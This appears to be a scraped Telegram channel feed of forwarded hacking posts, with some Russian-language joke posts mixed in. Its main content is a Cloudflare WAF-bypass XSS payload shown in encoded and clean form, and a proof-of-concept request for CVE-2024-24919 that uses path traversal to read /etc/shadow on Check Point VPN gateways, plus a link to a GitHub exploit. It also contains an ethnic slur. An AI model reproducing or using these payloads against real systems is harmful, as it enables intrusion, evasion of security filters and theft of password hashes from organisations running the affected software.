Forwarded from Cyber De Banditos
bypass XSS Cloudflare WAF
Encoded Payload:
Clean Payload:
HTML entity & URL encoding:
Encoded Payload:
"><track/onerror='confirm\%601\%60'>Clean Payload:
"><track/onerror='confirm1'>HTML entity & URL encoding:
" --> "
> --> >
< --> <
' --> '
` --> \%60🤮1
Forwarded from UPD: #𝐗𝐓𝐞𝐠𝐮 ♨️ (⋒𝕄𝕖𝕥𝕒𝕄𝕠𝕕𝕖𝕣𝕟 ♨️)
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚2
Forwarded from Inferno Solutions 🎯
тайный мануал по какому учаца кацапские "мастера по вызову", прошу не путать этих нелюдей с компьютерными мастерами 😂
❤4👏1
This media is not supported in your browser
VIEW IN TELEGRAM
Сис админы "СДЭК" чинят "Технический сбой"
😁4🤣2
Forwarded from Proxy Bar
CVE-2024-24919
*
Check Point Remote Access VPN 0-Day
*
FOFA link
*
POC:
#0day #checkpoint
*
Check Point Remote Access VPN 0-Day
*
FOFA link
*
POC:
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow#0day #checkpoint
Proxy Bar
CVE-2024-24919 * Check Point Remote Access VPN 0-Day * FOFA link * POC: POST /clients/MyCRL HTTP/1.1 Host: <redacted> Content-Length: 39 aCSHELL/../../../../../../../etc/shadow #0day #checkpoint
https://github.com/c3rrberu5/CVE-2024-24919
Nuclei Template to discover CVE-2024-24919. A path traversal vulnerability in CheckPoint SSLVPN.
#github exploit
Nuclei Template to discover CVE-2024-24919. A path traversal vulnerability in CheckPoint SSLVPN.
#github exploit
❤1